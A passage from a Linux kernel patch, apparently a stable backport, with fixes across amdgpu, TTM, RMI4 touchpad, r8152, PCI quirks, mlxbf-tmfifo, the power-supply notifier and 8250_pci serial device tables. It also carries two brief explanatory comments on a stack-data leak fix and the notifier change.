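	return 0;
}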
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
+index d2139ac121595..1ed2142a6e7bf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
+@@ -47,7 +47,6 @@ const unsigned int amdgpu_ctx_num_entities[AMDGPU_HW_IP_NUM] = {
+ bool amdgpu_ctx_priority_is_valid(int32_t ctx_prio)
+ {
+ 	switch (ctx_prio) {
+-	case AMDGPU_CTX_PRIORITY_UNSET:
+ 	case AMDGPU_CTX_PRIORITY_VERY_LOW:
+ 	case AMDGPU_CTX_PRIORITY_LOW:
+ 	case AMDGPU_CTX_PRIORITY_NORMAL:
+@@ -55,6 +54,7 @@ bool amdgpu_ctx_priority_is_valid(int32_t ctx_prio)
+ 	case AMDGPU_CTX_PRIORITY_VERY_HIGH:
+ 		return true;
+ 	default:
++	case AMDGPU_CTX_PRIORITY_UNSET:
+ 		return false;
+ 	}
+ }
+@@ -64,7 +64,8 @@ amdgpu_ctx_to_drm_sched_prio(int32_t ctx_prio)
+ {
+ 	switch (ctx_prio) {
+ 	case AMDGPU_CTX_PRIORITY_UNSET:
+-		return DRM_SCHED_PRIORITY_UNSET;
++		pr_warn_once("AMD-->DRM context priority value UNSET-->NORMAL");
++		return DRM_SCHED_PRIORITY_NORMAL;
+ 
+ 	case AMDGPU_CTX_PRIORITY_VERY_LOW:
+ 		return DRM_SCHED_PRIORITY_MIN;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_dma_buf.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_dma_buf.c
+index 7bd8e33b14be5..e8b3e9520cf6e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_dma_buf.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_dma_buf.c
+@@ -400,7 +400,10 @@ amdgpu_dma_buf_move_notify(struct dma_buf_attachment *attach)
+ 				continue;
+ 		}
+ 
+-		r = amdgpu_vm_clear_freed(adev, vm, NULL);
++		/* Reserve fences for two SDMA page table updates */
++		r = dma_resv_reserve_fences(resv, 2);
++		if (!r)
++			r = amdgpu_vm_clear_freed(adev, vm, NULL);
+ 		if (!r)
+ 			r = amdgpu_vm_handle_moved(adev, vm);
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_device.c b/drivers/gpu/drm/ttm/ttm_device.c
+index b84f74807ca13..ec9ddaad56a05 100644
+--- a/drivers/gpu/drm/ttm/ttm_device.c
++++ b/drivers/gpu/drm/ttm/ttm_device.c
+@@ -239,10 +239,6 @@ void ttm_device_fini(struct ttm_device *bdev)
+ 	struct ttm_resource_manager *man;
+ 	unsigned i;
+ 
+-	man = ttm_manager_type(bdev, TTM_PL_SYSTEM);
+-	ttm_resource_manager_set_used(man, false);
+-	ttm_set_driver_manager(bdev, TTM_PL_SYSTEM, NULL);
+-
+ 	mutex_lock(&ttm_global_mutex);
+ 	list_del(&bdev->device_list);
+ 	mutex_unlock(&ttm_global_mutex);
+@@ -252,6 +248,10 @@ void ttm_device_fini(struct ttm_device *bdev)
+ 	if (ttm_bo_delayed_delete(bdev, true))
+ 		pr_debug("Delayed destroy list was clean\n");
+ 
++	man = ttm_manager_type(bdev, TTM_PL_SYSTEM);
++	ttm_resource_manager_set_used(man, false);
++	ttm_set_driver_manager(bdev, TTM_PL_SYSTEM, NULL);
++
+ 	spin_lock(&bdev->lru_lock);
+ 	for (i = 0; i < TTM_MAX_BO_PRIORITY; ++i)
+ 		if (list_empty(&man->lru[0]))
+diff --git a/drivers/hwtracing/coresight/coresight-tmc-etr.c b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+index 1be0e5e0e80b2..c88a6afb29512 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc-etr.c
++++ b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+@@ -610,7 +610,8 @@ static int tmc_etr_alloc_flat_buf(struct tmc_drvdata *drvdata,
+ 
+ 	flat_buf->vaddr = dma_alloc_noncoherent(real_dev, etr_buf->size,
+ 						&flat_buf->daddr,
+-						DMA_FROM_DEVICE, GFP_KERNEL);
++						DMA_FROM_DEVICE,
++						GFP_KERNEL | __GFP_NOWARN);
+ 	if (!flat_buf->vaddr) {
+ 		kfree(flat_buf);
+ 		return -ENOMEM;
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index d2c9f4cbd00c6..e43e93ac2798a 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -1753,6 +1753,7 @@ static int synaptics_create_intertouch(struct psmouse *psmouse,
+ 		psmouse_matches_pnp_id(psmouse, topbuttonpad_pnp_ids) &&
+ 		!SYN_CAP_EXT_BUTTONS_STICK(info->ext_cap_10);
+ 	const struct rmi_device_platform_data pdata = {
++		.reset_delay_ms = 30,
+ 		.sensor_pdata = {
+ 			.sensor_type = rmi_sensor_touchpad,
+ 			.axis_align.flip_y = true,
+diff --git a/drivers/input/rmi4/rmi_smbus.c b/drivers/input/rmi4/rmi_smbus.c
+index c130468541b7d..7080c2ddbaf2b 100644
+--- a/drivers/input/rmi4/rmi_smbus.c
++++ b/drivers/input/rmi4/rmi_smbus.c
+@@ -235,12 +235,29 @@ static void rmi_smb_clear_state(struct rmi_smb_xport *rmi_smb)
+ 
+ static int rmi_smb_enable_smbus_mode(struct rmi_smb_xport *rmi_smb)
+ {
+-	int retval;
++	struct i2c_client *client = rmi_smb->client;
++	int smbus_version;
++
++	/*
++	 * The psmouse driver resets the controller; we only need to wait
++	 * to give the firmware a chance to fully reinitialize.
++	 */
++	if (rmi_smb->xport.pdata.reset_delay_ms)
++		msleep(rmi_smb->xport.pdata.reset_delay_ms);
+ 
+ 	/* we need to get the smbus version to activate the touchpad */
+-	retval = rmi_smb_get_version(rmi_smb);
+-	if (retval < 0)
+-		return retval;
++	smbus_version = rmi_smb_get_version(rmi_smb);
++	if (smbus_version < 0)
++		return smbus_version;
++
++	rmi_dbg(RMI_DEBUG_XPORT, &client->dev, "Smbus version is %d",
++		smbus_version);
++
++	if (smbus_version != 2 && smbus_version != 3) {
++		dev_err(&client->dev, "Unrecognized SMB version %d\n",
++				smbus_version);
++		return -ENODEV;
++	}
+ 
+ 	return 0;
+ }
+@@ -253,11 +270,10 @@ static int rmi_smb_reset(struct rmi_transport_dev *xport, u16 reset_addr)
+ 	rmi_smb_clear_state(rmi_smb);
+ 
+ 	/*
+-	 * we do not call the actual reset command, it has to be handled in
+-	 * PS/2 or there will be races between PS/2 and SMBus.
+-	 * PS/2 should ensure that a psmouse_reset is called before
+-	 * intializing the device and after it has been removed to be in a known
+-	 * state.
++	 * We do not call the actual reset command, it has to be handled in
++	 * PS/2 or there will be races between PS/2 and SMBus. PS/2 should
++	 * ensure that a psmouse_reset is called before initializing the
++	 * device and after it has been removed to be in a known state.
+ 	 */
+ 	return rmi_smb_enable_smbus_mode(rmi_smb);
+ }
+@@ -273,7 +289,6 @@ static int rmi_smb_probe(struct i2c_client *client,
+ {
+ 	struct rmi_device_platform_data *pdata = dev_get_platdata(&client->dev);
+ 	struct rmi_smb_xport *rmi_smb;
+-	int smbus_version;
+ 	int error;
+ 
+ 	if (!pdata) {
+@@ -312,18 +327,9 @@ static int rmi_smb_probe(struct i2c_client *client,
+ 	rmi_smb->xport.proto_name = "smb";
+ 	rmi_smb->xport.ops = &rmi_smb_ops;
+ 
+-	smbus_version = rmi_smb_get_version(rmi_smb);
+-	if (smbus_version < 0)
+-		return smbus_version;
+-
+-	rmi_dbg(RMI_DEBUG_XPORT, &client->dev, "Smbus version is %d",
+-		smbus_version);
+-
+-	if (smbus_version != 2 && smbus_version != 3) {
+-		dev_err(&client->dev, "Unrecognized SMB version %d\n",
+-				smbus_version);
+-		return -ENODEV;
+-	}
++	error = rmi_smb_enable_smbus_mode(rmi_smb);
++	if (error)
++		return error;
+ 
+ 	i2c_set_clientdata(client, rmi_smb);
+ 
+diff --git a/drivers/irqchip/irq-riscv-intc.c b/drivers/irqchip/irq-riscv-intc.c
+index 499e5f81b3fe3..4b66850978e6e 100644
+--- a/drivers/irqchip/irq-riscv-intc.c
++++ b/drivers/irqchip/irq-riscv-intc.c
+@@ -110,8 +110,16 @@ static int __init riscv_intc_init(struct device_node *node,
+ 	 * for each INTC DT node. We only need to do INTC initialization
+ 	 * for the INTC DT node belonging to boot CPU (or boot HART).
+ 	 */
+-	if (riscv_hartid_to_cpuid(hartid) != smp_processor_id())
++	if (riscv_hartid_to_cpuid(hartid) != smp_processor_id()) {
++		/*
++		 * The INTC nodes of each CPU are suppliers for downstream
++		 * interrupt controllers (such as PLIC, IMSIC and APLIC
++		 * direct-mode) so we should mark an INTC node as initialized
++		 * if we are not creating IRQ domain for it.
++		 */
++		fwnode_dev_initialized(of_fwnode_handle(node), true);
+ 		return 0;
++	}
+ 
+ 	intc_domain = irq_domain_add_linear(node, BITS_PER_LONG,
+ 					    &riscv_intc_domain_ops, NULL);
+diff --git a/drivers/irqchip/irq-stm32-exti.c b/drivers/irqchip/irq-stm32-exti.c
+index 8bbb2b114636c..dc6f67decb022 100644
+--- a/drivers/irqchip/irq-stm32-exti.c
++++ b/drivers/irqchip/irq-stm32-exti.c
+@@ -458,6 +458,7 @@ static const struct irq_domain_ops irq_exti_domain_ops = {
+ 	.map	= irq_map_generic_chip,
+ 	.alloc  = stm32_exti_alloc,
+ 	.free	= stm32_exti_free,
++	.xlate	= irq_domain_xlate_twocell,
+ };
+ 
+ static void stm32_irq_ack(struct irq_data *d)
+diff --git a/drivers/misc/pci_endpoint_test.c b/drivers/misc/pci_endpoint_test.c
+index d1e2f22537dbe..55dc16d8f6adb 100644
+--- a/drivers/misc/pci_endpoint_test.c
++++ b/drivers/misc/pci_endpoint_test.c
+@@ -71,6 +71,7 @@
+ #define PCI_DEVICE_ID_TI_AM654			0xb00c
+ #define PCI_DEVICE_ID_TI_J7200			0xb00f
+ #define PCI_DEVICE_ID_TI_AM64			0xb010
++#define PCI_DEVICE_ID_TI_J721S2		0xb013
+ #define PCI_DEVICE_ID_LS1088A			0x80c0
+ 
+ #define is_am654_pci_dev(pdev)		\
+@@ -1004,6 +1005,9 @@ static const struct pci_device_id pci_endpoint_test_tbl[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_AM64),
+ 	  .driver_data = (kernel_ulong_t)&j721e_data,
+ 	},
++	{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_J721S2),
++	  .driver_data = (kernel_ulong_t)&j721e_data,
++	},
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(pci, pci_endpoint_test_tbl);
+diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c
+index 8d719f82854a9..76de55306c4d0 100644
+--- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c
++++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c
+@@ -3816,6 +3816,8 @@ int t4_load_phy_fw(struct adapter *adap, int win,
+ 		 FW_PARAMS_PARAM_Z_V(FW_PARAMS_PARAM_DEV_PHYFW_DOWNLOAD));
+ 	ret = t4_set_params_timeout(adap, adap->mbox, adap->pf, 0, 1,
+ 				    &param, &val, 30000);
++	if (ret)
++		return ret;
+ 
+ 	/* If we have version number support, then check to see that the new
+ 	 * firmware got loaded properly.
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index c34974f7dfd26..345e341d22338 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -3655,6 +3655,8 @@ static void r8153b_ups_en(struct r8152 *tp, bool enable)
+ 			int i;
+ 
+ 			for (i = 0; i < 500; i++) {
++				if (test_bit(RTL8152_UNPLUG, &tp->flags))
++					return;
+ 				if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_BOOT_CTRL) &
+ 				    AUTOLOAD_DONE)
+ 					break;
+@@ -3695,6 +3697,8 @@ static void r8153c_ups_en(struct r8152 *tp, bool enable)
+ 			int i;
+ 
+ 			for (i = 0; i < 500; i++) {
++				if (test_bit(RTL8152_UNPLUG, &tp->flags))
++					return;
+ 				if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_BOOT_CTRL) &
+ 				    AUTOLOAD_DONE)
+ 					break;
+@@ -4058,6 +4062,9 @@ static int rtl_phy_patch_request(struct r8152 *tp, bool request, bool wait)
+ 	for (i = 0; wait && i < 5000; i++) {
+ 		u32 ocp_data;
+ 
++		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++			break;
++
+ 		usleep_range(1000, 2000);
+ 		ocp_data = ocp_reg_read(tp, OCP_PHY_PATCH_STAT);
+ 		if ((ocp_data & PATCH_READY) ^ check)
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 472fa2c8ebcec..30e7c627f21a7 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -595,7 +595,7 @@ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI,	PCI_DEVICE_ID_ATI_RS100,   quirk_ati_
+ /*
+  * In the AMD NL platform, this device ([1022:7912]) has a class code of
+  * PCI_CLASS_SERIAL_USB_XHCI (0x0c0330), which means the xhci driver will
+- * claim it.
++ * claim it. The same applies to the VanGogh platform device ([1022:163a]).
+  *
+  * But the dwc3 driver is a more specific driver for this device, and we'd
+  * prefer to use it instead of xhci. To prevent xhci from claiming the
+@@ -603,7 +603,7 @@ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI,	PCI_DEVICE_ID_ATI_RS100,   quirk_ati_
+  * defines as "USB device (not host controller)". The dwc3 driver can then
+  * claim it based on its Vendor and Device ID.
+  */
+-static void quirk_amd_nl_class(struct pci_dev *pdev)
++static void quirk_amd_dwc_class(struct pci_dev *pdev)
+ {
+ 	u32 class = pdev->class;
+ 
+@@ -613,7 +613,9 @@ static void quirk_amd_nl_class(struct pci_dev *pdev)
+ 		 class, pdev->class);
+ }
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_NL_USB,
+-		quirk_amd_nl_class);
++		quirk_amd_dwc_class);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_VANGOGH_USB,
++		quirk_amd_dwc_class);
+ 
+ /*
+  * Synopsys USB 3.x host HAPS platform has a class code of
+diff --git a/drivers/platform/mellanox/mlxbf-tmfifo.c b/drivers/platform/mellanox/mlxbf-tmfifo.c
+index a04ff89a7ec44..9925a6d94affc 100644
+--- a/drivers/platform/mellanox/mlxbf-tmfifo.c
++++ b/drivers/platform/mellanox/mlxbf-tmfifo.c
+@@ -588,24 +588,25 @@ static void mlxbf_tmfifo_rxtx_word(struct mlxbf_tmfifo_vring *vring,
+ 
+ 	if (vring->cur_len + sizeof(u64) <= len) {
+ 		/* The whole word. */
+-		if (!IS_VRING_DROP(vring)) {
+-			if (is_rx)
++		if (is_rx) {
++			if (!IS_VRING_DROP(vring))
+ 				memcpy(addr + vring->cur_len, &data,
+ 				       sizeof(u64));
+-			else
+-				memcpy(&data, addr + vring->cur_len,
+-				       sizeof(u64));
++		} else {
++			memcpy(&data, addr + vring->cur_len,
++			       sizeof(u64));
+ 		}
+ 		vring->cur_len += sizeof(u64);
+ 	} else {
+ 		/* Leftover bytes. */
+-		if (!IS_VRING_DROP(vring)) {
+-			if (is_rx)
++		if (is_rx) {
++			if (!IS_VRING_DROP(vring))
+ 				memcpy(addr + vring->cur_len, &data,
+ 				       len - vring->cur_len);
+-			else
+-				memcpy(&data, addr + vring->cur_len,
+-				       len - vring->cur_len);
++		} else {
++			data = 0;
++			memcpy(&data, addr + vring->cur_len,
++			       len - vring->cur_len);
+ 		}
+ 		vring->cur_len = len;
+ 	}
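
The transmit half of this hunk matters because the leftover-bytes path copies fewer than eight bytes into a u64 that is then written out whole; without the data = 0, the unused tail bytes carry stale stack contents onto the FIFO. A sketch of the rule, with a hypothetical helper name:

#include <linux/minmax.h>
#include <linux/string.h>
#include <linux/types.h>

/* Pack up to eight bytes into a FIFO word; zero it first so the
 * unused tail bytes never leak whatever was on the stack. */
static u64 pack_partial_word(const void *src, size_t len)
{
	u64 data = 0;

	memcpy(&data, src, min_t(size_t, len, sizeof(data)));
	return data;
}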
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 7871ab5e979c0..ac88c9636b663 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -29,7 +29,7 @@
+ struct class *power_supply_class;
+ EXPORT_SYMBOL_GPL(power_supply_class);
+ 
+-ATOMIC_NOTIFIER_HEAD(power_supply_notifier);
++BLOCKING_NOTIFIER_HEAD(power_supply_notifier);
+ EXPORT_SYMBOL_GPL(power_supply_notifier);
+ 
+ static struct device_type power_supply_dev_type;
+@@ -97,7 +97,7 @@ static void power_supply_changed_work(struct work_struct *work)
+ 		class_for_each_device(power_supply_class, NULL, psy,
+ 				      __power_supply_changed_work);
+ 		power_supply_update_leds(psy);
+-		atomic_notifier_call_chain(&power_supply_notifier,
++		blocking_notifier_call_chain(&power_supply_notifier,
+ 				PSY_EVENT_PROP_CHANGED, psy);
+ 		kobject_uevent(&psy->dev.kobj, KOBJ_CHANGE);
+ 		spin_lock_irqsave(&psy->changed_lock, flags);
+@@ -1112,13 +1112,13 @@ static void power_supply_dev_release(struct device *dev)
+ 
+ int power_supply_reg_notifier(struct notifier_block *nb)
+ {
+-	return atomic_notifier_chain_register(&power_supply_notifier, nb);
++	return blocking_notifier_chain_register(&power_supply_notifier, nb);
+ }
+ EXPORT_SYMBOL_GPL(power_supply_reg_notifier);
+ 
+ void power_supply_unreg_notifier(struct notifier_block *nb)
+ {
+-	atomic_notifier_chain_unregister(&power_supply_notifier, nb);
++	blocking_notifier_chain_unregister(&power_supply_notifier, nb);
+ }
+ EXPORT_SYMBOL_GPL(power_supply_unreg_notifier);
+ 
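
Switching the head from atomic to blocking changes the execution context for every registered callback: the chain is now protected by an rwsem rather than RCU, so callbacks run in process context and may sleep. A hypothetical consumer looks unchanged on the surface:

#include <linux/device.h>
#include <linux/notifier.h>
#include <linux/power_supply.h>

static int my_psy_event(struct notifier_block *nb, unsigned long event,
			void *data)
{
	struct power_supply *psy = data;

	/* sleeping is now allowed here, e.g. taking a mutex */
	if (event == PSY_EVENT_PROP_CHANGED)
		dev_dbg(&psy->dev, "%s changed\n", psy->desc->name);

	return NOTIFY_OK;
}

static struct notifier_block my_psy_nb = {
	.notifier_call	= my_psy_event,
};

/* e.g. from probe: power_supply_reg_notifier(&my_psy_nb); */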
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+index 8e24ebcebfe52..2ea3bdc638177 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+@@ -12914,8 +12914,10 @@ _mpt3sas_init(void)
+ 	mpt3sas_ctl_init(hbas_to_enumerate);
+ 
+ 	error = pci_register_driver(&mpt3sas_driver);
+-	if (error)
++	if (error) {
++		mpt3sas_ctl_exit(hbas_to_enumerate);
+ 		scsih_exit();
++	}
+ 
+ 	return error;
+ }
+diff --git a/drivers/spi/spi-npcm-fiu.c b/drivers/spi/spi-npcm-fiu.c
+index 49f6424e35af0..0624f52880705 100644
+--- a/drivers/spi/spi-npcm-fiu.c
++++ b/drivers/spi/spi-npcm-fiu.c
+@@ -353,8 +353,9 @@ static int npcm_fiu_uma_read(struct spi_mem *mem,
+ 		uma_cfg |= ilog2(op->cmd.buswidth);
+ 		uma_cfg |= ilog2(op->addr.buswidth)
+ 			<< NPCM_FIU_UMA_CFG_ADBPCK_SHIFT;
+-		uma_cfg |= ilog2(op->dummy.buswidth)
+-			<< NPCM_FIU_UMA_CFG_DBPCK_SHIFT;
++		if (op->dummy.nbytes)
++			uma_cfg |= ilog2(op->dummy.buswidth)
++				<< NPCM_FIU_UMA_CFG_DBPCK_SHIFT;
+ 		uma_cfg |= ilog2(op->data.buswidth)
+ 			<< NPCM_FIU_UMA_CFG_RDBPCK_SHIFT;
+ 		uma_cfg |= op->dummy.nbytes << NPCM_FIU_UMA_CFG_DBSIZ_SHIFT;
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index 4b43589304704..6b6abce6b69f4 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -3404,6 +3404,8 @@ static int gsm_modem_upd_via_msc(struct gsm_dlci *dlci, u8 brk)
+ 
+ static int gsm_modem_update(struct gsm_dlci *dlci, u8 brk)
+ {
++	if (dlci->gsm->dead)
++		return -EL2HLT;
+ 	if (dlci->adaption == 2) {
+ 		/* Send convergence layer type 2 empty data frame. */
+ 		gsm_modem_upd_via_data(dlci, brk);
+diff --git a/drivers/tty/serial/8250/8250_pci.c b/drivers/tty/serial/8250/8250_pci.c
+index 0ea89df6702f6..38fb7126ab0ef 100644
+--- a/drivers/tty/serial/8250/8250_pci.c
++++ b/drivers/tty/serial/8250/8250_pci.c
+@@ -2447,6 +2447,153 @@ static struct pci_serial_quirk pci_serial_quirks[] = {
+ 		.init			= pci_oxsemi_tornado_init,
+ 		.setup		= pci_oxsemi_tornado_setup,
+ 	},
++	/*
++	 * Brainboxes devices - all Oxsemi based
++	 */
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4027,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4028,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4029,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4019,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4016,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4015,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400A,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400E,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400C,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400B,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400F,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4010,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4011,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x401D,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x401E,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4013,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4017,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4018,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
+ 	{
+ 		.vendor         = PCI_VENDOR_ID_INTEL,
+ 		.device         = 0x8811,
+@@ -4931,6 +5078,12 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		0, 0,
+ 		pbn_b1_bt_1_115200 },
+ 
++	/*
++	 * IntaShield IS-100
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0D60,
++		PCI_ANY_ID, PCI_ANY_ID, 0, 0,
++		pbn_b2_1_115200 },
+ 	/*
+ 	 * IntaShield IS-200
+ 	 */
+@@ -4943,6 +5096,27 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 	{	PCI_VENDOR_ID_INTASHIELD, PCI_DEVICE_ID_INTASHIELD_IS400,
+ 		PCI_ANY_ID, PCI_ANY_ID, 0, 0,    /* 135a.0dc0 */
+ 		pbn_b2_4_115200 },
++	/*
++	 * IntaShield IX-100
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4027,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_1_15625000 },
++	/*
++	 * IntaShield IX-200
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4028,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_2_15625000 },
++	/*
++	 * IntaShield IX-400
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4029,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_4_15625000 },
+ 	/* Brainboxes Devices */
+ 	/*
+ 	* Brainboxes UC-101
+@@ -4958,10 +5132,14 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_1_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0AA2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_1_115200 },
+ 	/*
+-	 * Brainboxes UC-257
++	 * Brainboxes UC-253/UC-734
+ 	 */
+-	{	PCI_VENDOR_ID_INTASHIELD, 0x0861,
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0CA1,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_2_115200 },
+@@ -4997,6 +5175,14 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x08E2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x08E3,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
+ 	/*
+ 	 * Brainboxes UC-310
+ 	 */
+@@ -5007,6 +5193,14 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 	/*
+ 	 * Brainboxes UC-313
+ 	 */
++	{       PCI_VENDOR_ID_INTASHIELD, 0x08A1,
